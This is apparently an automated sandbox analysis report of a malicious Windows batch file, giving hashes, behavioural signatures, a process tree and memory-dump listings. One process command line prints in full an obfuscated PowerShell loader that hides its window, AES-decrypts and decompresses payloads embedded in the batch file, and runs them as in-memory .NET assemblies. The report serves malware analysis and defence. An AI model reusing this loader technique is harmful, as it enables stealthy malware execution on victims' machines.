Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 18-04-2024 01:38
Static task: static1
Behavioral task: behavioral1
- Sample: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
- Resource: win7-20240221-en (windows7-x64)
- 3 signatures
- 150 seconds
General
- Target: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
- Size: 6.9MB
- MD5: a65e873839228c5b453d6effa5d14d16
- SHA1: 40be429e0e6b41061f3291d10e720eaebf32eda1
- SHA256: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
- SHA512: 84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850
- SSDEEP: 24576:ClNzlllllllllllllllllllllllllllllllllllllllllllllllllllllllllllg:/
- Score: 1/10
Malware Config

Signatures
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    2884  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description             pid   process
    Token: SeDebugPrivilege 2884  powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes:
    description                       pid   process   target process
    PID 1688 wrote to memory of 2252  1688  cmd.exe   cmd.exe
    PID 1688 wrote to memory of 2252  1688  cmd.exe   cmd.exe
    PID 1688 wrote to memory of 2252  1688  cmd.exe   cmd.exe
    PID 2252 wrote to memory of 1292  2252  cmd.exe   cmd.exe
    PID 2252 wrote to memory of 1292  2252  cmd.exe   cmd.exe
    PID 2252 wrote to memory of 1292  2252  cmd.exe   cmd.exe
    PID 2252 wrote to memory of 2884  2252  cmd.exe   powershell.exe
    PID 2252 wrote to memory of 2884  2252  cmd.exe   powershell.exe
    PID 2252 wrote to memory of 2884  2252  cmd.exe   powershell.exe
Processes
- [depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat"
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- memory/2884-4-0x000000001B4F0000-0x000000001B7D2000-memory.dmp (Filesize: 2.9MB)
- memory/2884-5-0x0000000002890000-0x0000000002898000-memory.dmp (Filesize: 32KB)
- memory/2884-6-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp (Filesize: 9.6MB)
- memory/2884-7-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-8-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp (Filesize: 9.6MB)
- memory/2884-9-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-10-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-11-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp (Filesize: 9.6MB)
- memory/2884-12-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-13-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-14-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)
- memory/2884-15-0x00000000029D0000-0x0000000002A50000-memory.dmp (Filesize: 512KB)